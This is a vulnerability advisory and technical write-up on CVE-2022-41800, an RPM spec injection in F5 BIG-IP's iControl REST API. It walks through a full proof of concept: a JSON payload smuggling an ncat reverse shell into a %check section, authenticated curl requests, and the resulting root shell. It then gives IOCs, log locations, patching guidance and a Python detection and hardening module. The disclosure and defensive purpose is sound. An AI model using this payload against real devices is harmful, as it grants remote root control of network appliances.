Attacker Value: Very High (1 user assessed)
Exploitability: Very Low (1 user assessed)
User Interaction: None
Privileges Required: High
Attack Vector: Network

CVE-2022-41800

Disclosure Date: December 07, 2022
Exploited in the Wild

Description

In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.  

Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very Low
Technical Analysis

This permits a user who already has an administrator account to create a shell on the target device. There are other (authorized) ways to do this, so this vulnerability is pretty minor, IMO, although if it IS exploited it grants access to a network load balancer, which is kind of a big deal.

CVSS V3 Severity and Metrics
Base Score: 8.7 High
Impact Score: 5.8
Exploitability Score: 2.3
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): None
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): None

General Information

Vendors

  • f5

Products

  • big-ip access policy manager,
  • big-ip access policy manager 17.0.0,
  • big-ip advanced firewall manager,
  • big-ip analytics,
  • big-ip analytics 17.0.0,
  • big-ip application acceleration manager,
  • big-ip application acceleration manager 17.0.0,
  • big-ip application security manager,
  • big-ip application security manager 17.0.0,
  • big-ip domain name system,
  • big-ip domain name system 17.0.0,
  • big-ip fraud protection service,
  • big-ip fraud protection service 17.0.0,
  • big-ip global traffic manager,
  • big-ip global traffic manager 17.0.0,
  • big-ip link controller,
  • big-ip link controller 17.0.0,
  • big-ip local traffic manager,
  • big-ip local traffic manager 17.0.0,
  • big-ip policy enforcement manager,
  • big-ip policy enforcement manager 17.0.0


Technical Analysis

Description

On November 16, 2022, F5 released an advisory for F5 Big-IP covering several vulnerabilities, including CVE-2022-41800, an authenticated remote code execution vulnerability in the iControl REST interface.

CVE-2022-41800 requires valid administrative credentials (or an authorization bypass such as CVE-2022-1388) to exploit, as well as network-level access to the management interface, so it is unlikely to see widespread exploitation. We did, however, create a Metasploit module so that you can test your own devices.

The affected products are detailed in the vendor’s writeup. We tested against F5 Big-IP 17.0.0.1.

Technical analysis

F5 Big-IP’s JSON API has an administrator-only endpoint that creates an RPM specification file (.rpmspec), which a second administrator-only endpoint consumes to build an RPM. These endpoints are vulnerable to an injection attack on the RPM spec file: field values are written into the spec verbatim, so newlines in a value can introduce additional spec sections, including script sections such as %check whose shell commands run when the resulting RPM is built. This gives authenticated administrators (who may be malicious insiders, users of compromised accounts, etc.) the ability to run shell commands in an unexpected way.

To demonstrate the vulnerability, we developed this JSON payload:

{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444",
    "summary": "test9"
  }
}

Note the newlines and the %check directive in the description field; according to the RPM documentation, %check is the section normally used to run a package’s tests. We send that JSON as part of an authenticated request to /rpm-spec-creator:

$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}

The server responds with a specFilePath containing the spec we created. Here’s what the file looks like on the file system:

$ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial
Packager: F5 Networks <support@f5.com>

%description
test8

%check
ncat -e /bin/bash 10.0.0.179 4444

[...]

We start our listener on the host/port specified in the ncat command:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And build the RPM with /build-package (using jq to format the output):

$ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq

{
  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
  "generation": 1,
  "lastUpdateMicros": 1666214391730921,
  "kind": "shared:iapp:build-package:buildrpmtaskstate",
  "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"
}

Then verify that we get a root shell on our listener:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:58068.

whoami
root

IOCs

When exploiting this vulnerability, two files are potentially created:

  • /var/config/rest/node/tmp/<random uuid>.spec
  • /var/config/rest/node/tmp/RPMS/noarch/<name>.noarch.rpm

The latter can be avoided if the injected %check exits with a non-zero status, in which case only the .spec file is written, but the failed build then creates a log entry. In our Metasploit module, we remove both files as soon as we obtain a session.

Any access to the pair of RPM endpoints should also be considered suspicious, although they do have benign uses:

  • /mgmt/shared/iapp/build-package
  • /mgmt/shared/iapp/rpm-spec-creator

Additional files that may log this attack are:

  • /var/log/restjavad.*.log contains error messages if the build fails (which doesn’t necessarily happen)
  • /var/log/restjavad-audit.*.log is an access log, and will show those endpoints being accessed (which might be benign)
  • /var/log/restnoded/restnoded*.log also shows the endpoints being accessed

Guidance

Administrators should patch their F5 Big-IP devices as per the guidance from the vendor. Additionally, organizations should ensure that the management interface for F5 Big-IP is not easily accessible on the network level.
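The injection described in the technical analysis and the IOCs listed above, as an added example that is not F5’s code and not Rapid7’s Metasploit module: a Python reconstruction of the spec-rendering bug class next to a hardened renderer that refuses the payload, a parser that splits a recovered .spec into sections so the injected %check body is visible, and a scan over audit-log lines for the two RPM endpoints. The spec template in build_spec_vulnerable (only the tags visible in the spec shown above), the rule that rpm macro syntax is forbidden in every field, and the audit-log line layout are assumptions; the sample log lines are constructed.

```python
import re

# Endpoints named in the analysis; access to either is worth reviewing.
RPM_ENDPOINTS = (
    "/mgmt/shared/iapp/rpm-spec-creator",
    "/mgmt/shared/iapp/build-package",
)

# Request fields (from the payload above) that are copied into the spec.
SPEC_FIELDS = ("summary", "name", "version", "release", "description")

# Sections whose bodies rpmbuild runs as shell scripts.
SCRIPT_SECTIONS = {"%prep", "%build", "%install", "%check", "%clean",
                   "%pre", "%post", "%preun", "%postun"}

# A '%word' at the start of a line opens a new spec section.
SECTION_RE = re.compile(r"^[ \t]*(%[A-Za-z]+)\b", re.MULTILINE)


def build_spec_vulnerable(fields):
    """Render the spec by plain string concatenation, as an injectable
    generator would (reconstruction, not F5's code). Nothing strips newlines,
    so a description of 'x\\n\\n%check\\ncmd' opens a %check section whose
    body runs as a shell script when the RPM is built."""
    return (
        f"Summary: {fields['summary']}\n"
        f"Name: {fields['name']}\n"
        f"Version: {fields['version']}\n"
        f"Release: {fields['release']}\n"
        "BuildArch: noarch\n"
        "Group: Development/Libraries\n"
        "License: Commercial\n"
        "\n"
        f"%description\n{fields['description']}\n"
    )


def validate_fields(fields):
    """Return the reasons the fields must not be rendered (empty when clean).
    Line breaks are rejected in single-line tags. '%' is rejected everywhere
    (assumed conservative rule): rpm expands macros inside tag values and
    section bodies, so any '%' the caller controls is syntax, not data."""
    problems = []
    for tag in SPEC_FIELDS:
        value = fields.get(tag, "")
        if not isinstance(value, str):
            problems.append(f"{tag}: not a string")
            continue
        if "%" in value:
            problems.append(f"{tag}: contains '%'")
        if tag != "description" and ("\n" in value or "\r" in value):
            problems.append(f"{tag}: contains a line break")
    return problems


def build_spec_safe(fields):
    """Hardened renderer: refuse rather than render on any violation."""
    problems = validate_fields(fields)
    if problems:
        raise ValueError("; ".join(problems))
    return build_spec_vulnerable(fields)


def spec_sections(spec_text):
    """Split a .spec (e.g. one recovered from /var/config/rest/node/tmp) into
    ordered (directive, body) pairs; text before the first directive is
    returned under 'preamble'."""
    out, pos, name = [], 0, "preamble"
    for m in SECTION_RE.finditer(spec_text):
        out.append((name, spec_text[pos:m.start()].strip()))
        name, pos = m.group(1), m.end()
    out.append((name, spec_text[pos:].strip()))
    return out


def injected_commands(spec_text):
    """Bodies of the script sections in a recovered spec. Compare against a
    spec produced by a benign request on the same build; anything extra
    (here, the %check body) is the injected payload."""
    return [(name, body) for name, body in spec_sections(spec_text)
            if name in SCRIPT_SECTIONS and body]


def scan_audit_log(lines):
    """Flag log lines that reference either RPM endpoint; only the path
    substring is relied on, so the exact line layout does not matter."""
    return [(ep, line.rstrip()) for line in lines
            for ep in RPM_ENDPOINTS if ep in line]


# The payload from the analysis above, as the generator receives it.
PAYLOAD = {
    "name": "test", "srcBasePath": "/tmp", "version": "test6",
    "release": "test7", "summary": "test9",
    "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444",
}

# Constructed audit-log lines (layout assumed, not real restjavad output).
SAMPLE_AUDIT = [
    "[admin] POST /mgmt/shared/iapp/rpm-spec-creator 200",
    "[admin] GET /mgmt/tm/ltm/virtual 200",
    "[admin] POST /mgmt/shared/iapp/build-package 202",
]

if __name__ == "__main__":
    print(injected_commands(build_spec_vulnerable(PAYLOAD)))
    print(validate_fields(PAYLOAD))
    print(scan_audit_log(SAMPLE_AUDIT))
```

Running the module renders the payload the injectable way and shows the %check body that rpmbuild would execute, then shows the hardened validator rejecting the same payload on its '%' alone; for triage, feed the contents of any /var/config/rest/node/tmp/*.spec to spec_sections and the restjavad-audit log to scan_audit_log.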
